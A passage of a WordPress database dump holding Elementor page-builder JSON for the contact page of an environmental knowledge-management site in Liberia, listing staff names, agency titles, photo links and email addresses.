href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23238,3369,'_elementor_edit_mode','builder'),(23239,3369,'_elementor_template_type','wp-page'),(23240,3369,'_elementor_version','3.0.16'),(23241,3369,'_wp_page_template','default'),(23242,3369,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a 